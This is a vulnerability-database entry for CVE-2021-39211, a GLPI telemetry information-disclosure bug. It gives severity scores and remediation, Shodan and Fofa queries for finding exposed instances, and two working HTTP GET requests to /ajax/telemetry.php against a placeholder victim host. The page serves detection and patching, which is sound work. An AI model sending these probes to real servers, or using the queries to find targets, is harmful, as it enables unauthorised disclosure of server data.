🔙 목록으로 돌아가기

CVE-2021-39211: GLPI 9.2/<9.5.6 - Information Disclosure

TitleGLPI 9.2/<9.5.6 - Information Disclosure
Authordogasantos,noraj
SeverityMedium
ImpactInformation disclosure vulnerability in GLPI versions 9.2 to <9.5.6 allows an attacker to access sensitive information.
RemediationThis issue is fixed in version 9.5.6. As a workaround, remove the file ajax/telemetry.php, which is not needed for usual GLPI functions.
CVSS Score5.3
EPSS Score0.54404
CVE IDCVE-2021-39211
CWE IDCWE-200,NVD-CWE-noinfo
Shodan Queryhttp.title:"glpi"http.favicon.hash:"-1474875778"
Fofa Queryicon_hash="-1474875778"title="glpi"
Tags cve cve2021 glpi exposure glpi-project vkev vuln

🔍 Vulnerability Description

GLPI 9.2 and prior to 9.5.6 is susceptible to information disclosure via the telemetry endpoint, which discloses GLPI and server information. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.

🌐 HTTP Request

GET /ajax/telemetry.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.0.2 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /glpi/ajax/telemetry.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-39211.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-39211.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A